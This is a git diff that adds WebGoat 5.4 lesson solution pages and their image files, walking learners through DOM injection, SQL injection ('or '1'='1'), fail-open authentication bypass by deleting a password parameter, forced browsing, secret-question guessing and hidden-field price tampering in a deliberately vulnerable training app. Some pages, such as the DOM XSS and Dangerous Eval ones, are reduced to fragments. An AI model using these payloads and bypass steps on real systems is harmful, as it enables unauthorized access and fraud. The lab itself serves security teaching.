diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection.html b/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection.html
new file mode 100644
index 000000000..1e73150f0
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection.html
@@ -0,0 +1,865 @@
+
+
+
+
+
+
Lesson
+Plan Title: How to
+Perform DOM Injection Attack.
+
+
+
+
Concept /
+Topic To Teach:
+
+
How to
+perform DOM injection attacks.
+
+
+
+
How the
+attacks works:
+
+
Some applications
+specially the ones that uses AJAX manipulates and updates the DOM directly
+using JavaScript, DHTML and eval() method.
+
+
+
+
General
+Goal(s):
+
+
*
+Your victim is a system that takes an activation key to allow you to use it.
+
+
+
+
+
+
Figure 1 AJAX Security - DOM Injection
+
+
+
+
Solution:
+
+
+
+
AJAX requires
+XML communication between the browser and the web application. When you view
+the source of the HTML page, you will notice the usage of XMLHttpRequest:
+
+
+
+
<script>
+
+
function
+validate() {
+
+
var keyField
+= document.getElementById('key');
+
+
var url =
+'attack?Screen=80&menu=1150&from=ajax&key=' +
+encodeURIComponent(keyField.value);
+
+
if (typeof
+XMLHttpRequest != 'undefined') {
+
+
req
+= new XMLHttpRequest();
+
+
} else if
+(window.ActiveXObject) {
+
+
req
+= new ActiveXObject('Microsoft.XMLHTTP');
+
+
}
+
+
req.open('GET', url, true);
+
+
req.onreadystatechange = callback;
+
+
req.send(null);
+
+
}
+
+
function
+callback() {
+
+
if (req.readyState == 4) {
+
+
if (req.status == 200) {
+
+
var message = req.responseText;
+
+
eval(message);
+
+
}}}
+
+
</script>
+
+
+
+
The XML
+response contains JavaScript that will activate the button so that you are able
+to click on it. This requires you to inject JavaScript to manipulate the
+Document Object Model of the HTML page in the browser. This requires
+intercepting the HTTP response in WebScarab!
+
+
+
+
Enter a
+license key (for example 'a') and intercept the HTTP Request and HTTP Response
+in WebScarab.
+
+
+
+
+
+
Figure 2 HTTP Request
+
+
+
+
+
+
Figure 3 HTTP Response
+
+
+
+
Intercept the
+reply and replace the body with document.form.SUBMIT.disabled = false;
+
+
+
+
+
+
Figure 4 Updated HTTP Response
+
+
+
+
The button “Activate!” is now enabled!
+
+
+
+
+
+
Figure 5 Activate! Button is enabled
+
+
+
+
+
+
Figure 6 Lesson completed
+
+
+
+
+
+
+ Solution by Erwin Geirnaert
+
+
+
+
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/colorschememapping.xml b/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/image001.png b/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/image001.png
new file mode 100644
index 000000000..8d3b529b0
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/image001.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/image002.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/image002.jpg
new file mode 100644
index 000000000..3f3bccdf5
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/image002.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/image003.png b/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/image003.png
new file mode 100644
index 000000000..9effd17b9
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/image003.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/image004.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/image004.jpg
new file mode 100644
index 000000000..016c16e12
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/image004.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/image005.png b/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/image005.png
new file mode 100644
index 000000000..844b00d92
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/image005.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/image006.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/image006.jpg
new file mode 100644
index 000000000..c3349b050
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/image006.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/image007.png b/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/image007.png
new file mode 100644
index 000000000..d0b0aec8e
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/image007.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/image008.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/image008.jpg
new file mode 100644
index 000000000..18a4764fe
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/image008.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/image008fix.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/image008fix.jpg
new file mode 100644
index 000000000..1112e63f7
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/image008fix.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/image009.png b/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/image009.png
new file mode 100644
index 000000000..d1021bceb
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/image009.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/image010.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/image010.jpg
new file mode 100644
index 000000000..e9bc078c3
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/image010.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/image011.png b/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/image011.png
new file mode 100644
index 000000000..efe585a32
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/image011.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/image012.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/image012.jpg
new file mode 100644
index 000000000..dd8bf4ac4
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/image012.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/themedata.thmx b/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/DOMInjection_files/themedata.thmx differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/DOMXSS.html b/webgoat-5.4/src/main/webapp/lesson_solutions/DOMXSS.html
new file mode 100644
index 000000000..2cfa4d90d
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/DOMXSS.html
@@ -0,0 +1,51 @@
+
+
+
+DOM Based Cross Site Scripting (XSS)
+Lesson Plan Title: DOM Based Cross Site Scripting (XSS)
+
+Concept / Topic To Teach:
+
+General Goal(s):
+
+Solution: Stage 1 result Stage 2 result Stage 3 result Stage 4 result function displayGreeting(name) { name + "!"; function displayGreeting(name) { escapeHTML(name); + "!";
+
+
Lesson
+Plan Title: Denial of
+Service from Multiple Logins
+
+
+
+
Concept /
+Topic To Teach:
+
+
Denial of
+service attacks are a major issue in web applications. If the end user cannot conduct
+business or perform the service offered by the web application, then both time
+and money is wasted.
+
+
+
+
General
+Goal(s):
+
+
This site
+allows a user to login multiple times. This site has a database connection pool
+that allows 2 connections. You must obtain a list of valid users and create a
+total of 3 logins.
+
+
Solution:
+
+
+
+
This site
+allows a user to login multiple times. There is a database connection pool that
+allows 2 connections. You must obtain a list of valid users and create a total
+of 3 logins.
+
+
+
+
Let's try a
+SQL Injection attack. Enter in the password field ' or '1' = '1
+
+
+
+
+
+
Figure 1 Lesson 20
+
+
+
+
Login with
+user name jsnow and password passwd1. Then login with user name jdoe and
+password passwd1. And finally login with jplane and passwd3.
+
+
+
+
+
+
Figure 2 Lesson 20 Completed
+
+
+
+
+
+
+
+
+ Solution by Erwin Geirnaert
+
+
+
+
+
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/DOS_Login_files/colorschememapping.xml b/webgoat-5.4/src/main/webapp/lesson_solutions/DOS_Login_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/DOS_Login_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/DOS_Login_files/image001.png b/webgoat-5.4/src/main/webapp/lesson_solutions/DOS_Login_files/image001.png
new file mode 100644
index 000000000..dc2669fe2
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/DOS_Login_files/image001.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/DOS_Login_files/image002.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/DOS_Login_files/image002.jpg
new file mode 100644
index 000000000..6f5c75387
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/DOS_Login_files/image002.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/DOS_Login_files/image003.png b/webgoat-5.4/src/main/webapp/lesson_solutions/DOS_Login_files/image003.png
new file mode 100644
index 000000000..45396104d
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/DOS_Login_files/image003.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/DOS_Login_files/image004.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/DOS_Login_files/image004.jpg
new file mode 100644
index 000000000..372cdca56
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/DOS_Login_files/image004.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/DOS_Login_files/themedata.thmx b/webgoat-5.4/src/main/webapp/lesson_solutions/DOS_Login_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/DOS_Login_files/themedata.thmx differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/DangerousEval.html b/webgoat-5.4/src/main/webapp/lesson_solutions/DangerousEval.html
new file mode 100644
index 000000000..a2f353c50
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/DangerousEval.html
@@ -0,0 +1,28 @@
+
+
+
+Dangerous Use of Eval
+Lesson Plan Title: Dangerous Use of Eval)
+
+Concept / Topic To Teach:
+
+General Goal(s):
+
+Solution: 123'); ');
+Encoding Basics
+Lesson Plan Title: How to Perform Cross Site Scripting (XSS)
+
+Concept / Topic To Teach:
+
+General Goal(s):
+
+Solution:
+
+
Lesson Plan Title: How to Bypass a Fail Open
+Authentication Scheme
+
+
+
+
Concept / Topic To Teach: Abusing error handling.
+
+
+
+
This lesson presents
+the basics for understanding the "fail open" condition regarding
+authentication. The security term, "fail open" describes a behavior of a
+verification mechanism. This is when an error (i.e. unexpected exception)
+occurs during a verification method causing that method to evaluate to true.
+This is especially dangerous during login.
+
+
+
+
General Goal(s):
+
+
The user
+should be able to bypass the authentication check.
+
+
+
+
+
+
Figure 1 Lesson 19
+
+
+
+
Solution:
+
+
+
+
Enter user
+name webgoat and click "Login". Intercept the request with WebScarab.
+
+
+
+
+
+
Figure 2 Intercepted request
+
+
+
+
Click on the
+variable "Password" and click "Delete". Click "Accept changes".
+
+
+
+
+
+
Figure 3 Password variable is deleted
+
+
+
+
You are now
+"authenticated" as WebGoat.
+
+
+
+
+
+
Figure 4 Lesson 19 Completed
+
+
+
+
The problem
+is that the exception handler in the Java code is executing a catch block for successful
+authentication. The exception occurs because there is a NullPointer exception
+when reading out the password parameter.
+
+
+
+
+
+
+
+
+ Solution by Erwin Geirnaert
+
+
+
+
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/colorschememapping.xml b/webgoat-5.4/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image001.png b/webgoat-5.4/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image001.png
new file mode 100644
index 000000000..44e09369d
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image001.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image003.png b/webgoat-5.4/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image003.png
new file mode 100644
index 000000000..1cf2cc012
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image003.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image005.png b/webgoat-5.4/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image005.png
new file mode 100644
index 000000000..9f5747a75
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image005.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image007.png b/webgoat-5.4/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image007.png
new file mode 100644
index 000000000..0845266c4
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image007.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image009.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image009.jpg
new file mode 100644
index 000000000..c871b0225
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image009.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image010.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image010.jpg
new file mode 100644
index 000000000..74cec6054
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image010.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image011.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image011.jpg
new file mode 100644
index 000000000..29defb100
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image011.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image012.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image012.jpg
new file mode 100644
index 000000000..09d5ac828
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image012.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/themedata.thmx b/webgoat-5.4/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/themedata.thmx differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ForcedBrowsing.html b/webgoat-5.4/src/main/webapp/lesson_solutions/ForcedBrowsing.html
new file mode 100644
index 000000000..be8032dac
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/ForcedBrowsing.html
@@ -0,0 +1,767 @@
+
+
+
+
+
+
Lesson
+Plan Title: How to
+Perform Forced Browsing Attacks.
+
+
+
+
Concept
+/ Topic To Teach:
+
+
How
+to Exploit Forced Browsing.
+
+
+
+
How
+the attacks works:
+
+
Forced
+browsing is a technique used by attackers to gain access to resources that are
+not referenced, but are nevertheless accessible. One technique is to manipulate
+the URL in the browser by deleting sections from the end until an unprotected
+directory is found
+
+
+
+
General
+Goal(s):
+
+
Your
+goal should be to try to guess the URL for the "config" interface.
+
+
+
+
+
+
Figure 1 Insecure configuration
+management – Forced Browsing
+
+
+
+
Solution:
+
+
If you want to access a restricted page, you need to
+be able to guess the URI to access the page, for example /admin.
+
+
In this environment, WebGoat consists of different
+servlets that live in the WebGoat application. The main servlet is /attack,
+what could be the servlet for config?
+
+
+
+
Try to access config,
+configuration, conf, ….
+
+
+
+
+
+
Figure 2 No config
+
+
+
+
+
+
Figure 3 No configuration
+
+
+
+
+
+
Figure 4 Bingo for conf
+
+
+
+
This
+could be automated with a tool like Wikto 2.0
+
+
+
+
+
+
+ Solution by Erwin Geirnaert
+
+
+
+
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ForcedBrowsing_files/colorschememapping.xml b/webgoat-5.4/src/main/webapp/lesson_solutions/ForcedBrowsing_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/ForcedBrowsing_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image001.png b/webgoat-5.4/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image001.png
new file mode 100644
index 000000000..c9047d693
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image001.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image002.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image002.jpg
new file mode 100644
index 000000000..101e688a4
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image002.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image003.png b/webgoat-5.4/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image003.png
new file mode 100644
index 000000000..569dc0098
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image003.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image004.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image004.jpg
new file mode 100644
index 000000000..6fe272fa4
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image004.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image005.png b/webgoat-5.4/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image005.png
new file mode 100644
index 000000000..f2945e2b0
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image005.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image006.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image006.jpg
new file mode 100644
index 000000000..7ec274b62
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image006.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image007.png b/webgoat-5.4/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image007.png
new file mode 100644
index 000000000..a001e7963
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image007.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image008.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image008.jpg
new file mode 100644
index 000000000..672f7af05
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image008.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ForcedBrowsing_files/themedata.thmx b/webgoat-5.4/src/main/webapp/lesson_solutions/ForcedBrowsing_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/ForcedBrowsing_files/themedata.thmx differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword.html b/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword.html
new file mode 100644
index 000000000..f32e4dd12
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword.html
@@ -0,0 +1,828 @@
+
+
+
+
+
+
Lesson
+Plan Title: How to
+Exploit the Forgot Password Page
+
+
+
+
Concept /
+Topic To Teach:
+
+
+
+
Web
+applications frequently provide their users the ability to retrieve a forgotten
+password. Unfortunately, many web applications fail to implement the mechanism
+properly. The information required to verify the identity of the user is often
+overly simplistic.
+
+
+
+
General
+Goal(s):
+
+
Users can
+retrieve their password if they can answer the secret question properly. There
+is no lock-out mechanism on this 'Forgot Password' page. Your username is
+'webgoat' and your favorite color is 'red'. The goal is to retrieve the
+password of another user.
+
+
+
+
Solution:
+
+
+
+
This lesson
+will show you how easy it is to guess a secret question and retrieve somebody
+else his password.
+
+
+
+
+
+
Figure 1 Lesson 10
+
+
+
+
When you
+enter the user name webgoat and then the answer "red" for your favorite color,
+you will get a password reminder, only not via e-mail.
+
+
+
+
+
+
Figure 2 Submit the answer red
+
+
+
+
+
+
Figure 3 Password reminder for user webgoat
+
+
+
+
The password
+for user webgoat is webgoat. This is a weak password policy, which is also a
+bad thing J
+
+
+
+
Now you need
+to guess the password for another user. The text tells you something about an
+"OWASP admin". So let’s try "admin" for a user name.
+
+
+
+
+
+
Figure 4 Is there a user admin?
+
+
+
+
This works.
+Now you need the guess some colors.
+
+
+
+
+
+
Figure 5 There is a user admin!
+
+
+
+
+
+
Try blue, red
+and green for example.
+
+
+
+
+
+
Figure 6 No blue
+
+
+
+
Blue is an
+incorrect response.
+
+
+
+
+
+
Figure 7 It's green!
+
+
+
+
Green is the
+correct answer and now you know the difficult password for user admin.
+
+
+
+
+
+
+
+
+
+
+ Solution by Erwin Geirnaert
+
+
+
+
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/colorschememapping.xml b/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image001.png b/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image001.png
new file mode 100644
index 000000000..3e10c76d3
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image001.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image003.png b/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image003.png
new file mode 100644
index 000000000..11a7001dc
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image003.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image005.png b/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image005.png
new file mode 100644
index 000000000..033f2e8c8
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image005.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image007.png b/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image007.png
new file mode 100644
index 000000000..664c24a06
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image007.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image009.png b/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image009.png
new file mode 100644
index 000000000..e0e2ffb7c
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image009.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image011.png b/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image011.png
new file mode 100644
index 000000000..4542c5240
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image011.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image013.png b/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image013.png
new file mode 100644
index 000000000..f72055656
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image013.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image015.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image015.jpg
new file mode 100644
index 000000000..1f670723b
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image015.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image016.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image016.jpg
new file mode 100644
index 000000000..6f8105ce7
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image016.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image017.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image017.jpg
new file mode 100644
index 000000000..76540dad8
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image017.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image018.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image018.jpg
new file mode 100644
index 000000000..76c23e5ea
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image018.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image019.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image019.jpg
new file mode 100644
index 000000000..fc38db81d
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image019.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image020.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image020.jpg
new file mode 100644
index 000000000..c5a2f719f
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image020.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image021.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image021.jpg
new file mode 100644
index 000000000..5798c0713
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/image021.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/themedata.thmx b/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/ForgotPassword_files/themedata.thmx differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering.html b/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering.html
new file mode 100644
index 000000000..c5c3cf825
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering.html
@@ -0,0 +1,685 @@
+
+
+
+
+
+
Lesson
+Plan Title: How to
+Exploit Hidden Fields
+
+
+
+
Concept /
+Topic To Teach:
+
+
Developers
+will use hidden fields for tracking, login, pricing, etc.. information on a
+loaded page. While this is a convenient and easy mechanism for the developer,
+they often don't validate the information that is received from the hidden
+field. This lesson will teach the attacker to find and modify hidden fields to
+obtain a product for a price other than the price specified
+
+
+
+
General
+Goal(s):
+
+
The user
+should be able to exploit a hidden field to obtain a product at an incorrect
+price.
+
+
+
+
+
+
Figure 1 Lesson 4
+
+
+
+
Solution:
+
+
+
+
To change the
+hidden field you need to start your favorite HTTP Interceptor. You can use
+WebScarab from OWASP to intercept the request and change the hidden field.
+Configure your browser to use a local proxy. In Internet Explorer you can do
+this via "Tools" – "Internet Options" – "Connections" – "LAN Settings". You
+must define proxy "localhost" with port 8008.
+
+
+
+
+
+
Figure 2 Set local proxy in Internet Explorer
+
+
+
+
Start
+WebScarab
+
+
+
+
+
+
Figure 3 Intercept request with WebScarab
